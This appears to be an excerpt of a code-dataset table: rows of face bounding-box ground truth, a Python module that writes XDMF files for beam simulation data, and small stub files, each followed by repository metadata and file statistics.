jpg',202,273,244,323],['madaboutyou.jpg',396,281,434,325],['married.jpg',38,94,76,138],['married.jpg',169,44,207,88],['married.jpg',294,59,330,99],['mickymouse-self-p.jpg',418,263,448,291],['mickymouse-self-p.jpg',544,303,634,423],['mona-lisa.jpg',187,150,281,258],['natalie1.jpg',118,179,440,537],['nens.jpg',36,164,60,184],['nens.jpg',90,168,114,188],['nens.jpg',143,172,165,192],['nens.jpg',191,165,213,185],['nens.jpg',169,100,191,120],['nens.jpg',119,108,141,128],['nens.jpg',63,106,85,128],['nens.jpg',15,88,41,110],['nens.jpg',48,38,70,58],['nens.jpg',96,29,118,51],['nens.jpg',149,16,173,36],['nens.jpg',202,25,224,47],['nens.jpg',237,112,257,132],['nens.jpg',152,235,176,259],['newsradio.jpg',99,267,143,321],['newsradio.jpg',220,185,262,233],['newsradio.jpg',316,264,354,308],['newsradio.jpg',383,210,443,260],['newsradio.jpg',313,130,361,178],['newsradio.jpg',232,86,274,130],['newsradio.jpg',55,128,105,182],['newsradio.jpg',141,172,181,216],['our-cards.jpg',549,45,581,79],['our-cards.jpg',112,786,154,824],['patio.jpg',129,47,167,89],['police.jpg',143,231,199,297],['police.jpg',234,234,298,296],['police.jpg',345,221,405,287],['rehg-thanksgiving-1994.jpg',122,90,146,122],['rehg-thanksgiving-1994.jpg',164,162,192,192],['rehg-thanksgiving-1994.jpg',222,87,242,107],['rehg-thanksgiving-1994.jpg',298,123,320,147],['rehg-thanksgiving-1994.jpg',294,77,318,97],['rehg-thanksgiving-1994.jpg',354,90,376,112],['rehg-thanksgiving-1994.jpg',410,97,436,123],['sarah4.jpg',104,142,230,284],['sarah_live_2.jpg',41,33,435,455],['seinfeld.jpg',102,50,128,80],['seinfeld.jpg',161,64,189,90],['seinfeld.jpg',238,61,266,83],['seinfeld.jpg',326,45,350,77],['speed.jpg',37,45,67,73],['tori-crucify.jpg',147,156,213,228],['tori-entweekly.jpg',184,124,310,282],['tori-live3.jpg',199,48,253,102],['tress-photo-2.jpg',152,136,170,152],['tress-photo.jpg',175,146,201,170],['u2-cover.jpg',187,208,285,274],['waynesworld2.jpg',128,92,162,132],['waynesworld2.jpg',256,68,292,100],['window.jpg',123,48,149,80],['window.jpg',212,48,244,78],['wxm.jpg',39,29,69,61],['ysato.jpg',73,73,123,135],['our-cards.jpg',550,249,582,285],['our-cards.jpg',69,956,103,998]]
return ValidationGroundTruthsList
| 5,566
| 16,644
| 0.683794
| 3,231
| 16,698
| 3.532962
| 0.238007
| 0.049934
| 0.037232
| 0.013141
| 0.016645
| 0
| 0
| 0
| 0
| 0
| 0
| 0.358119
| 0.000479
| 16,698
| 3
| 16,645
| 5,566
| 0.325824
| 0
| 0
| 0
| 0
| 0
| 0.379184
| 0.039404
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e9da9176a0ade90bac5842d9014985314416f769
| 49
|
py
|
Python
|
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
lib/ctyEnge/EngineeringSkills/__init__.py
|
JoshOrndorff/snippets
|
ef06e03de09897014f88d89a84b597aabde7edaa
|
[
"Unlicense"
] | null | null | null |
from .EngineeringSkills import EngineeringSkills
| 24.5
| 48
| 0.897959
| 4
| 49
| 11
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e9dcf49e925ed3e887eb0787961c752c8bab2716
| 6,254
|
py
|
Python
|
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | null | null | null |
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 13
|
2018-02-08T23:22:59.000Z
|
2020-12-06T19:40:32.000Z
|
proteus/mprans/ArchiveBeams.py
|
acatwithacomputer/proteus
|
80dfad95da6ab4d18a88a035f55c26b03540a864
|
[
"MIT"
] | 1
|
2020-02-17T03:25:34.000Z
|
2020-02-17T03:25:34.000Z
|
from __future__ import print_function
from builtins import range
import numpy as np
def InitializeXdmf(filename="beam"):
f = open(filename + ".xmf", 'w')
f.write('<?xml version="1.0" ?>' + '\n'
+ '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
+ '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
+ '\t<Domain> \n'
+ '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n'
+ '\t\t</Grid> \n'
+ '\t</Domain> \n'
+ '</Xdmf>')
f.close()
def AddTimestep(Beam_x,
Beam_y,
Beam_z,
nBeams,
filename="beam",
t=0.0):
f = open(filename + ".xmf", 'r')
data_list = f.readlines()
f.close()
print(data_list)
del data_list[-1]
del data_list[-1]
del data_list[-1]
f = open(filename + ".xmf", 'w')
f.writelines(data_list)
f.write('\t\t\t<Grid GridType="Uniform">\n'
+ '\t\t\t\t<Time Value="' + repr(t) + '" />\n'
+ '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) +' ' + repr(Beam_x[0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
count = 0
for i in range(len(Beam_x)):
for j in range(Beam_x[i].size):
f.write(repr(count) + ' ')
count += 1
f.write('\n')
f.write('\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Topology>\n'
+ '\t\t\t\t<Geometry GeometryType="XYZ">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x) * Beam_x[0].size) +' 3" NumberType="Float" Precision="4" Format="XML">\n')
for i in range(len(Beam_x)):
for j in range(Beam_x[i].size):
sp = repr(Beam_x[i][j]) + ' ' + repr(Beam_y[i][j]) + ' ' + repr(Beam_z[i][j]) + '\n'
f.write(sp)
f.write('\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Geometry>\n'
+ '\t\t\t</Grid>\n'
+ '\t\t</Grid>\n'
+ '\t</Domain>\n'
+ '</Xdmf>\n')
f.close()
def Archive_parallel(Beam_x,
Beam_y,
Beam_z,
nBeams,
filename="beam",
tList=[0.0]):
f = open(filename + ".xmf", 'w')
f.write('<?xml version="1.0" ?>' + '\n'
+ '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
+ '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
+ '\t<Domain> \n'
+ '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n')
for k in range(len(tList)):
f.write('\t\t\t<Grid GridType="Uniform">\n'
+ '\t\t\t\t<Time Value="' + repr(tList[k]) + '" />\n'
+ '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) +' ' + repr(Beam_x[k][0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
count = 0
for i in range(len(Beam_x[k])):
for j in range(Beam_x[k][i].size):
f.write(repr(count) + ' ')
count += 1
f.write('\n')
f.write('<?xml version="1.0" ?>' + '\n'
+ '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
+ '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
+ '\t<Domain> \n'
+ '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n'
'\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Topology>\n'
+ '\t\t\t\t<Geometry GeometryType="XYZ">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x[k]) * Beam_x[k][0].size) +' 3" NumberType="Float" Precision="4" Format="XML">\n')
for i in range(len(Beam_x[k])):
for j in range(Beam_x[k][i].size):
sp = repr(Beam_x[k][i][j]) + ' ' + repr(Beam_y[k][i][j]) + ' ' + repr(Beam_z[k][i][j]) + '\n'
f.write(sp)
f.write('\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Geometry>\n'
+ '\t\t\t</Grid>\n')
f.write('\t\t</Grid>\n'
+ '\t</Domain>\n'
+ '</Xdmf>\n')
f.close()
def Archive_time_step(Beam_x,
Beam_y,
Beam_z,
nBeams,
filename="beam",
t=0.0,
tStep=0):
f = open(filename + repr(tStep)+".xmf", 'w')
# f.writelines(data_list)
f.write('<?xml version="1.0" ?>' + '\n'
+ '<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" []>' + '\n'
+ '<Xdmf Version="2.0" xmlns:xi="http://www.w3.org/2001/XInclude">' + '\n'
+ '\t<Domain> \n'
+ '\t\t<Grid CollectionType="Temporal" GridType="Collection" Name="Mesh Spatial_Domain"> \n'
+ '\t\t\t<Grid GridType="Uniform">\n'
+ '\t\t\t\t<Time Value="' + repr(t) + '" />\n'
+ '\t\t\t\t<Topology TopologyType="Polyline" Dimensions="' + repr(nBeams) + '">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(nBeams) +' ' + repr(Beam_x[0].size) + '" NumberType="Int" Precision="8" Format="XML">\n')
count = 0
for i in range(len(Beam_x)):
for j in range(Beam_x[i].size):
f.write(repr(count) + ' ')
count += 1
f.write('\n')
f.write('\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Topology>\n'
+ '\t\t\t\t<Geometry GeometryType="XYZ">\n'
+ '\t\t\t\t\t<DataItem Dimensions="' + repr(len(Beam_x) * Beam_x[0].size) +' 3" NumberType="Float" Precision="4" Format="XML">\n')
for i in range(len(Beam_x)):
for j in range(Beam_x[i].size):
sp = repr(Beam_x[i][j]) + ' ' + repr(Beam_y[i][j]) + ' ' + repr(Beam_z[i][j]) + '\n'
f.write(sp)
f.write('\t\t\t\t\t</DataItem>\n'
+ '\t\t\t\t</Geometry>\n'
+ '\t\t\t</Grid>\n'
+ '\t\t</Grid>\n'
+ '\t</Domain>\n'
+ '</Xdmf>\n')
f.close()
| 41.417219
| 152
| 0.461145
| 873
| 6,254
| 3.237113
| 0.106529
| 0.079972
| 0.076433
| 0.055202
| 0.918613
| 0.90552
| 0.890658
| 0.890658
| 0.861642
| 0.843949
| 0
| 0.015629
| 0.314519
| 6,254
| 150
| 153
| 41.693333
| 0.643574
| 0.003678
| 0
| 0.8
| 0
| 0.059259
| 0.383529
| 0.103227
| 0.059259
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0
| 0.022222
| 0
| 0.051852
| 0.014815
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
75e2abb6e9c54e3b9b6d2f1fc97fc5f39d8bf899
| 84
|
py
|
Python
|
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 10
|
2018-03-30T16:09:02.000Z
|
2021-12-07T07:29:19.000Z
|
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | null | null | null |
win/devkit/other/pymel/extras/completion/py/maya/app/general/pointOnPolyConstraint.py
|
leegoonz/Maya-devkit
|
b81fe799b58e854e4ef16435426d60446e975871
|
[
"ADSL"
] | 9
|
2018-06-02T09:18:49.000Z
|
2021-12-20T09:24:35.000Z
|
import maya.cmds as cmds
import maya.OpenMaya as om
def assembleCmd():
pass
| 9.333333
| 26
| 0.714286
| 13
| 84
| 4.615385
| 0.692308
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22619
| 84
| 8
| 27
| 10.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.